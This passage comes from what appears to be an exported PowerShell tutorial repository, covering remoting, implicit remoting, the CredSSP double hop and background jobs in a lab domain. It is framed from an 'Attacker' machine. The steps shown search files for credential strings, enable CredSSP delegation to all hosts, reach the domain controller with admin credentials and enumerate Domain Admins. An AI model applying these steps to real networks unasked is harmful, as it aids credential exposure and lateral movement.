\npassword.\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_Workflows.help.txt:157: -Credential \nDomain01\\Admin01\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_Workflows.help.txt:174: -Credential \nDomain01\\Admin01 \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Automatic_Variables.help.txt:109: typically C:\\Users\\.\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:181: parameter set, a UserName \nparameter in the User parameter set, and a \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:194: $UserName,\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:220: $UserName,\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:561: $UserName\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_OutputTypeAttribute.help.txt:133: $UserName\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Jobs.help.txt:287: The following command starts a job without the required \ncredentials. It\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Jobs.help.txt:305: credentials to run the command. The value of the Reason \nproperty is:\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Language_Modes.help.txt:172: PSCredential\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Pipelines.help.txt:367: Parameter [Credential] PIPELINE INPUT \nValueFromPipelineByPropertyName NO COERCION\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Preference_Variables.help.txt:1084: ProxyCredential :\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:106: the current user must be able to supply the \ncredentials of a member of \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:142: only if you can supply the credentials of the user \nwho created the\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:144: includes RunAs credentials. Otherwise, you can \nget, connect to, use,\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Disconnected_Sessions.help.txt:94: but only if they can supply the \ncredentials that were used \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Disconnected_Sessions.help.txt:95: to create the session, or use the RunAs \ncredentials of\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:63: name and password credentials on the local computer or the \ncredentials\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:65: The credentials and the rest of the transmission are \nencrypted. \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:513: to use the Credential parameter of the Invoke-Command, \nNew-PSSession,\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:514: or Enter-PSSession cmdlets to provide the credentials of \na member of the \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:521: credentials.\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Requirements.help.txt:62: provide the credentials of an administrator. \nOtherwise, the command fails.\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:273: HOW TO PROVIDE ADMINISTRATOR CREDENTIALS \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:279: computer. Credentials are sometimes required \neven when the current user is\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:283: computer, or can provide the credentials of a \nmember of the Administrators\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:284: group, use the Credential parameter of the \nNew-PSSession, Enter-PSSession\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:287: For example, the following command provides \nthe credentials of an\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:290: Invoke-Command -ComputerName Server01 \n-Credential Domain01\\Admin01\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:292: For more information about the Credential \nparameter, see New-PSSession,\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:374: 2. Use the Credential parameter in all remote \ncommands.\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:376: This is required even when you are \nsubmitting the credentials\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:400: 2. Verify that a password is set on the \nworkgroup-based computer. If a\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:401: password is not set or the password value \nis empty, you cannot run\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:404: To set password for your user account, use \nUser Accounts in Control\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:408: 3. Use the Credential parameter in all remote \ncommands.\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:410: This is required even when you are \nsubmitting the credentials\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:544: -- ProxyCredential\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:548: 1. Use the ProxyAccessType, \nProxyAuthentication, and ProxyCredential\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:562: -ProxyAuthentication Negotiate \n-ProxyCredential Domain01\\User01\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:44: function ScreenPassword($instance)\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:50: foreach ($a in @(get-wmiobject win32_desktop)) { \nScreenPassword($a) }\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:53: This script checks each user account. The ScreenPassword \nfunction returns \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:54: the name of any user account that does not have a \npassword-protected \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:55: screen saver. If the screen saver is password protected, the \nfunction \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:529: $Cred = Get-Credential\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:530: Invoke-Command $s {Remove-Item .\\Test*.ps1 -Credential \n$Using:Cred} \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:537: $Cred = Get-Credential\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:538: Invoke-Command $s {param($c) Remove-Item .\\Test*.ps1 \n-Credential $c} -ArgumentList $Cred \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Script_Internationalization.help.txt:157:if (!($username)) { $msgTable.promptMsg } \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Session_Configurations.help.txt:304: the WithProfile session configuration or \ncan supply the credentials of a\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Session_Configuration_Files.help.txt:230: RunAsPassword \nNoteProperty System.String RunAsPassword=\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:173: The MakeCert.exe tool will prompt you for a private key \npassword. The \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:174: password ensures that no one can use or access the \ncertificate without\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:175: your consent. Create and enter a password that you can \nremember. You will \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:176: use this password later to retrieve the certificate.\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:277: 6. Type a password, and then type it again to confirm.\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:293: 4. On the Password page, select \"Enable strong private \nkey protection\",\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:294: and then enter the password that you assigned during \nthe export \nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:156: The Update-Help and Save-Help cmdlets have a \nUseDefaultCredentials\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:157: parameter that provides the explicit credentials of \nthe current\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:161: The Update-Help and Save-Help cmdlets also have a \nCredential\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:164: Credential parameter is valid only when you use the \nSourcePath\n\nPS C:\\Users\\Administrator> \n```\n" }, { "path": "24-Powershell-Remoting-Part-5.md", "content": "#### 24. Powershell Remoting Part 5\n\n#### Advanced PowerShell Remoting\n\r- Using ```Invoke-Command``` ```state-fully``` across ```sessions```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> New-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n\n Id Name ComputerName State ConfigurationName Availability\n -- ---- ------------ ----- ----------------- ------------\n 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available\n\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-PSSession\n\n Id Name ComputerName State ConfigurationName Availability\n -- ---- ------------ ----- ----------------- ------------\n 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available\n\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> $sess = Get-PSSession\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Invoke-Command -ScriptBlock { $procs = Get-Process } -Session $sess\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Invoke-Command -ScriptBlock { $procs } -Session $sess\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName\n------- ------ ----- ----- ----- ------ -- ----------- --------------\n 23 2 1756 2020 30 0.00 1288 cmd JOHN-PC\n 22 2 1688 2060 30 0.01 1552 cmd JOHN-PC\n 40 3 708 3228 42 0.05 1220 conhost JOHN-PC\n 34 2 596 2664 32 0.00 3124 conhost JOHN-PC\n 417 5 1112 2300 33 0.12 352 csrss JOHN-PC\n 205 6 1220 2932 33 0.47 408 csrss JOHN-PC\n 66 3 892 2704 38 0.02 912 dwm JOHN-PC\n 789 23 24836 36064 196 2.99 696 explorer JOHN-PC\n 0 0 0 12 0 0 Idle JOHN-PC\n 731 12 3044 6840 32 1.11 492 lsass JOHN-PC\n 195 5 1628 3524 23 0.10 500 lsm JOHN-PC\n 56 3 868 4040 57 0.07 3160 notepad JOHN-PC\n 134 5 6272 4712 63 0.13 2924 python JOHN-PC\n 645 16 22040 13084 108 0.62 1664 SearchIndexer JOHN-PC\n 194 7 4120 5824 35 0.74 476 services JOHN-PC\n 29 1 216 520 4 0.06 272 smss JOHN-PC\n 282 9 4356 5732 58 0.03 1356 spoolsv JOHN-PC\n 347 7 2876 6084 38 0.41 624 svchost JOHN-PC\n 256 8 2496 5120 26 0.45 736 svchost JOHN-PC\n 554 13 14144 11188 77 0.75 788 svchost JOHN-PC\n 525 13 22960 26920 101 4.31 872 svchost JOHN-PC\n 1169 30 17248 20256 116 4.56 960 svchost JOHN-PC\n 440 16 6260 9468 55 0.64 1124 svchost JOHN-PC\n 693 26 12396 12236 81 0.97 1232 svchost JOHN-PC\n 303 24 9356 9012 48 0.72 1392 svchost JOHN-PC\n 347 15 5192 8320 66 0.41 1500 svchost JOHN-PC\n 357 35 144352 18592 210 11.60 1956 svchost JOHN-PC\n 346 13 7988 9420 66 1.43 2772 svchost JOHN-PC\n 94 7 1092 3908 25 0.10 3816 svchost JOHN-PC\n 562 0 44 556 2 4 System JOHN-PC\n 138 8 1972 3976 38 0.05 1292 taskhost JOHN-PC\n 115 5 1656 3420 44 0.35 684 VBoxService JOHN-PC\n 138 5 1220 3724 60 0.06 2104 VBoxTray JOHN-PC\n 74 5 780 2488 32 0.23 400 wininit JOHN-PC\n 113 4 1492 3156 39 0.27 448 winlogon JOHN-PC\n 439 15 7812 9964 107 0.58 556 wmpnetwk JOHN-PC\n 211 10 27928 36028 143 0.73 3476 wsmprovhost JOHN-PC\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n- ```Implicit Remoting```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> New-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n\n Id Name ComputerName State ConfigurationName Availability\n -- ---- ------------ ----- ----------------- ------------\n 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available\n\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-PSSession\n\n Id Name ComputerName State ConfigurationName Availability\n -- ---- ------------ ----- ----------------- ------------\n 7 Session7 JOHN-PC Opened Microsoft.PowerShell Available\n\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> $sess = Get-PSSession\n```\n\nCreate a ```Get-Sysinfo``` function on the remote machine\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Invoke-Command -ScriptBlock { function Get-Sysinfo { whoami; $env:COMPUTERNAME } } -Session $sess\n```\n\nImport the ```Get-Sysinfo``` function on our local machine\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Import-PSSession -CommandName Get-Sysinfo -Session $sess\n\nModuleType Version Name ExportedCommands\n---------- ------- ---- ----------------\nScript 1.0 tmp_4giwtlau.knk Get-Sysinfo\n\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-Sysinfo\njohn-pc\\john\nJOHN-PC\nPS C:\\Users\\Administrator\\Desktop>\n```\n\nExport the ```Get-Sysinfo``` function into a module\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $sess\nWARNING: Proxy creation has been skipped for the following command: 'Get-Sysinfo', because it would shadow an existing local command. Use the AllowClobber parameter if you want to shadow existing local\n commands.\nExport-PSSession : No command proxies have been created, because all of the requested remote commands would shadow existing local commands. Use the AllowClobber parameter if you want to shadow\nexisting local commands.\nAt line:1 char:1\n+ Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $ses ...\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : InvalidResult: (:) [Export-PSSession], ArgumentException\n + FullyQualifiedErrorId : ErrorNoCommandsImportedBecauseOfSkipping,Microsoft.PowerShell.Commands.ExportPSSessionCommand\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $sess -AllowClobber -Force\n\n Directory: C:\\Users\\Administrator\\Documents\\WindowsPowerShell\\Modules\\domainmodule\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/11/2017 5:15 PM 99 domainmodule.format.ps1xml\n-a--- 7/11/2017 5:15 PM 596 domainmodule.psd1\n-a--- 7/11/2017 5:15 PM 11689 domainmodule.psm1\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Import-Module domainmodule\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-Command -Module domainmodule\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Get-Sysinfo domainmodule\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-Sysinfo\njohn-pc\\john\nJOHN-PC\nPS C:\\Users\\Administrator\\Desktop>\n```" }, { "path": "25-Powershell-Remoting-Part-6.md", "content": "#### 25. Powershell Remoting Part 6\n\n###### The Double Hop Problem\n\n![Image of Hop](images/4.jpeg)\n\n- ```Target 1``` - ```Windows Client``` - ```Part of a Domain```\n- ```Target 2``` - ```Windows Server``` - ```Domain Controller```\n\n- On ```Attacker```\n\n```PowerShell\nPS C:\\Windows\\system32> Enable-WSManCredSSP -Role Client -DelegateComputer *\n\nCredSSP Authentication Configuration for WS-Management\nCredSSP authentication allows the user credentials on this computer to be sent to a remote computer. If you use CredSSP\n authentication for a connection to a malicious or compromised computer, that computer will have access to your user\nname and password. For more information, see the Enable-WSManCredSSP Help topic.\nDo you want to enable CredSSP authentication?\n[Y] Yes [N] No [S] Suspend [?] Help (default is \"Y\"): Y\n\ncfg : http://schemas.microsoft.com/wbem/wsman/1/config/client/auth\nlang : en-US\nBasic : true\nDigest : true\nKerberos : true\nNegotiate : true\nCertificate : true\nCredSSP : true\n\nPS C:\\Windows\\system32> \n```\n\n```PowerShell\nPS C:\\Windows\\system32> Get-WSManCredSSP\nThe machine is configured to allow delegating fresh credentials to the following target(s): wsman/*\nThis computer is not configured to receive credentials from a remote client computer.\nPS C:\\Windows\\system32>\n```\n\n- ```Enter-PSSession``` from ```Attacker``` machine on ```Target 1```\n\n```PowerShell\nPS C:\\Users\\Windows7-64> Enter-PSSession -ComputerName JOHN-PC -Credential PFPT\\Administrator\n[john-pc]: PS C:\\Users\\Administrator\\Documents> whoami\npfpt\\administrator\n[john-pc]: PS C:\\Users\\Administrator\\Documents> Enable-WSManCredSSP -Role Server\n[john-pc]: PS C:\\Users\\Administrator\\Documents> Get-WSManCredSSP\n[john-pc]: PS C:\\Users\\Administrator\\Documents> exit\n```\n\n- ```Enter-PSSession``` from ```Attacker``` machine on ```Target 1``` using ```Authentication``` as ```CredSSP```\n\n```PowerShell\nPS C:\\Users\\Windows7-64> Enter-PSSession -ComputerName JOHN-PC -Credential PFPT\\Administrator -Authentication CredSSP\n```\n\n- Access remote resources on the ```Domain Controller``` i.e. ```Target 2```\n\n```PowerShell\nPS C:\\Users\\Windows7-64> Enter-PSSession -ComputerName JOHN-PC -Credential PFPT\\Administrator -Authentication CredSSP\n[john-pc]: PS C:\\Users\\Administrator\\Documents> ls \\\\pfpt\\sysvol\n\n\n Directory: \\\\pfpt\\sysvol\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd---- 7/9/2017 12:59 PM pfpt.com\n\n\nPS C:\\Users\\Administrator>\n```\n\n###### ADIS Type Accelerators\n\n- ADSI\n\n```Active Directory Service Interfaces``` is a set of COM interfaces used to access the features of directory services from different network providers.\n\n- Query the members of ```Domain Admin``` group\n\n```\n([ADSI]\"LDAP://cn=Domain Admins,cn=Users,dc=,dc=Com\").Member\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> ([ADSI]\"LDAP://cn=Domain Admins,cn=Users,dc=pfpt,dc=Com\").Member\nCN=Administrator,CN=Users,DC=pfpt,DC=com\nPS C:\\Users\\Administrator>\n```\n\n- Query the ```DC``` for a ```user``` to determine the ```groups``` he is a member of\n\n```\n([ADSI]\"LDAP://cn=,cn=Users,dc=,dc=Com\").MemberOf\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> ([ADSI]\"LDAP://cn=Administrator,cn=Users,dc=pfpt,dc=Com\").MemberOf\nCN=Group Policy Creator Owners,CN=Users,DC=pfpt,DC=com\nCN=Domain Admins,CN=Users,DC=pfpt,DC=com\nCN=Enterprise Admins,CN=Users,DC=pfpt,DC=com\nCN=Schema Admins,CN=Users,DC=pfpt,DC=com\nCN=Administrators,CN=Builtin,DC=pfpt,DC=com\nPS C:\\Users\\Administrator>\n```" }, { "path": "26-Jobs-in-Powershell.md", "content": "#### 26. Jobs in Powershell\n\n###### Jobs\n\n- ```Help``` system for ```job```\n\n```PowerShell\nPS C:\\Users\\Administrator> help *job*\n\nStart-Job Cmdlet Microsoft.PowerShell.Core Starts a Windows PowerShell background job.\nGet-Job Cmdlet Microsoft.PowerShell.Core Gets Windows PowerShell background jobs that are running in the current session.\nReceive-Job Cmdlet Microsoft.PowerShell.Core Gets the results of the Windows PowerShell background jobs in the current session.\nStop-Job Cmdlet Microsoft.PowerShell.Core Stops a Windows PowerShell background job.\nWait-Job Cmdlet Microsoft.PowerShell.Core Suppresses the command prompt until one or all of the Windows PowerShell background jobs running in the session are complete.\nRemove-Job Cmdlet Microsoft.PowerShell.Core Deletes a Windows PowerShell background job.\nSuspend-Job Cmdlet Microsoft.PowerShell.Core Temporarily stops workflow jobs.\nResume-Job Cmdlet Microsoft.PowerShell.Core Restarts a suspended job\nGet-PrintJob Function PrintManagement ...\nRemove-PrintJob Function PrintManagement ...\nRestart-PrintJob Function PrintManagement ...\nResume-PrintJob Function PrintManagement ...\nSuspend-PrintJob Function PrintManagement ...\nNew-JobTrigger Cmdlet PSScheduledJob New-JobTrigger...\nAdd-JobTrigger Cmdlet PSScheduledJob Add-JobTrigger...\nRemove-JobTrigger Cmdlet PSScheduledJob Remove-JobTrigger...\nGet-JobTrigger Cmdlet PSScheduledJob Get-JobTrigger...\nSet-JobTrigger Cmdlet PSScheduledJob Set-JobTrigger...\nEnable-JobTrigger Cmdlet PSScheduledJob Enable-JobTrigger...\nDisable-JobTrigger Cmdlet PSScheduledJob Disable-JobTrigger...\nNew-ScheduledJobOption Cmdlet PSScheduledJob New-ScheduledJobOption...\nGet-ScheduledJobOption Cmdlet PSScheduledJob Get-ScheduledJobOption...\nSet-ScheduledJobOption Cmdlet PSScheduledJob Set-ScheduledJobOption...\nRegister-ScheduledJob Cmdlet PSScheduledJob Register-ScheduledJob...\nGet-ScheduledJob Cmdlet PSScheduledJob Get-ScheduledJob...\nSet-ScheduledJob Cmdlet PSScheduledJob Set-ScheduledJob...\nUnregister-ScheduledJob Cmdlet PSScheduledJob Unregister-ScheduledJob...\nEnable-ScheduledJob Cmdlet PSScheduledJob Enable-ScheduledJob...\nDisable-ScheduledJob Cmdlet PSScheduledJob Disable-ScheduledJob...\nGet-RDVirtualDesktopCollection... Function RemoteDesktop ...\nStop-RDVirtualDesktopCollectio... Function RemoteDesktop ...\nGet-StorageJob Function Storage ...\nabout_Jobs HelpFile Provides information about how Windows PowerShell background jobs run a\nabout_Job_Details HelpFile Provides details about background jobs on local and remote computers.\nabout_Remote_Jobs HelpFile Describes how to run background jobs on remote computers.\nabout_Scheduled_Jobs HelpFile Describes scheduled jobs and explains how to use and manage\nabout_Scheduled_Jobs_Advanced HelpFile Explains advanced scheduled job topics, including the file structure\nabout_Scheduled_Jobs_Basics HelpFile Explains how to create and manage scheduled jobs.\nabout_Scheduled_Jobs_Troublesh... HelpFile Explains how to resolve problems with scheduled jobs\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Commands``` with ```jobs```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Command *job*\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Get-PrintJob PrintManagement\nFunction Get-RDVirtualDesktopCollectionJobStatus RemoteDesktop\nFunction Get-StorageJob Storage\nFunction Remove-PrintJob PrintManagement\nFunction Restart-PrintJob PrintManagement\nFunction Resume-PrintJob PrintManagement\nFunction Stop-RDVirtualDesktopCollectionJob RemoteDesktop\nFunction Suspend-PrintJob PrintManagement\nCmdlet Add-JobTrigger PSScheduledJob\nCmdlet Disable-JobTrigger PSScheduledJob\nCmdlet Disable-ScheduledJob PSScheduledJob\nCmdlet Enable-JobTrigger PSScheduledJob\nCmdlet Enable-ScheduledJob PSScheduledJob\nCmdlet Get-Job Microsoft.PowerShell.Core\nCmdlet Get-JobTrigger PSScheduledJob\nCmdlet Get-ScheduledJob PSScheduledJob\nCmdlet Get-ScheduledJobOption PSScheduledJob\nCmdlet New-JobTrigger PSScheduledJob\nCmdlet New-ScheduledJobOption PSScheduledJob\nCmdlet Receive-Job Microsoft.PowerShell.Core\nCmdlet Register-ScheduledJob PSScheduledJob\nCmdlet Remove-Job Microsoft.PowerShell.Core\nCmdlet Remove-JobTrigger PSScheduledJob\nCmdlet Resume-Job Microsoft.PowerShell.Core\nCmdlet Set-JobTrigger PSScheduledJob\nCmdlet Set-ScheduledJob PSScheduledJob\nCmdlet Set-ScheduledJobOption PSScheduledJob\nCmdlet Start-Job Microsoft.PowerShell.Core\nCmdlet Stop-Job Microsoft.PowerShell.Core\nCmdlet Suspend-Job Microsoft.PowerShell.Core\nCmdlet Unregister-ScheduledJob PSScheduledJob\nCmdlet Wait-Job Microsoft.PowerShell.Core\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Start``` a ```job```\n\n```PowerShell\nPS C:\\Users\\Administrator> Start-Job -ScriptBlock {whoami}\n\nId Name PSJobTypeName State HasMoreData Location Command\n-- ---- ------------- ----- ----------- -------- -------\n2 Job2 BackgroundJob Running True localhost whoami\n\nPS C:\\Users\\Administrator>\n```\n\n- List all ```jobs```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Job\n\nId Name PSJobTypeName State HasMoreData Location Command\n-- ---- ------------- ----- ----------- -------- -------\n2 Job2 BackgroundJob Completed True localhost whoami\n\nPS C:\\Users\\Administrator>\n```\n\n- Receive ```output``` of a ```job```\r\r```PowerShell\nPS C:\\Users\\Administrator> Get-Job | Receive-Job\npfpt\\administrator\nPS C:\\Users\\Administrator>\n```\n\n- Remove ```job```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Job | Remove-Jobs\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Job\n```\n\n- ```Local job```\n\n```PowerShell\nPS C:\\Users\\Administrator> Start-Job -FilePath .\\Desktop\\HelloWorld.ps1\n\nId Name PSJobTypeName State HasMoreData Location Command\n-- ---- ------------- ----- ----------- -------- -------\n2 Job2 BackgroundJob Running True localhost \"Hello World\"\n\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Job -Id 2\n\nId Name PSJobTypeName State HasMoreData Location Command\n-- ---- ------------- ----- ----------- -------- -------\n2 Job2 BackgroundJob Completed True localhost \"Hello World\"\n\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Job -Id 2 | Receive-Job\nHello World\nPS C:\\Users\\Administrator>\n```\n\n- ```Remote job```\n\n```Cmdlets``` with parameter ```Asjob```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Command -ParameterName Asjob\n\nCommandType Name ModuleName\n----------- ---- ----------\nCmdlet Get-WmiObject Microsoft.PowerShell.Management\nCmdlet Invoke-Command Microsoft.PowerShell.Core\nCmdlet Invoke-WmiMethod Microsoft.PowerShell.Management\nCmdlet Remove-WmiObject Microsoft.PowerShell.Management\nCmdlet Restart-Computer Microsoft.PowerShell.Management\nCmdlet Set-WmiInstance Microsoft.PowerShell.Management\nCmdlet Stop-Computer Microsoft.PowerShell.Management\nCmdlet Test-Connection Microsoft.PowerShell.Management\n\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {ps} -ComputerName JOHN-PC -Credential John-PC\\John\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName\n------- ------ ----- ----- ----- ------ -- ----------- --------------\n 128 5 14992 11460 44 1004 audiodg JOHN-PC\n 35 2 1344 3288 33 0.02 3108 conhost JOHN-PC\n 460 5 1064 2596 33 0.11 348 csrss JOHN-PC\n 214 6 1104 3628 32 0.26 404 csrss JOHN-PC\n 162 8 2344 8804 72 0.19 3772 dllhost JOHN-PC\n 68 4 932 3196 39 0.03 1132 dwm JOHN-PC\n 996 32 30576 44884 241 2.82 940 explorer JOHN-PC\n 0 0 0 12 0 0 Idle JOHN-PC\n 803 15 2944 8192 33 0.61 496 lsass JOHN-PC\n 196 5 1596 3916 23 0.05 504 lsm JOHN-PC\n 235 10 28168 36120 156 0.44 3100 powershell JOHN-PC\n 668 16 16072 9712 89 0.30 2224 SearchIndexer JOHN-PC\n 201 7 4272 6148 34 0.63 488 services JOHN-PC\n 29 1 216 664 4 0.05 272 smss JOHN-PC\n 281 9 4404 7320 58 0.06 1324 spoolsv JOHN-PC\n 143 4 1788 4076 28 0.38 1524 sppsvc 